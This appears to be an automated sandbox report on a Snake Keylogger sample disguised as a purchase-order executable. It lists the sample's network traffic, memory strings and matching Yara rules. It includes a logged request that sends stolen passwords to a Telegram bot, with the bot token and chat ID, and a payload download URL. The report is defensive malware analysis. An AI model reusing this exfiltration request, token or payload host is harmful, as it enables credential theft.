Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49813 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfe6ad1716199Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: InstallUtil.exe, 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000007.00000002.3709580619.000000000322C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A24000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000294C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3716708744.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000007.00000002.3709580619.0000000003179000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003331000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com/ruurew/Gksrgyexmxn.pdf
Source: PO_63738373663838____________________________________________________________________________.exe, Keywords.exe.0.dr	String found in binary or memory: https://erkasera.com/ruurew/Gksrgyexmxn.pdfYj
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
Source: InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49922 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
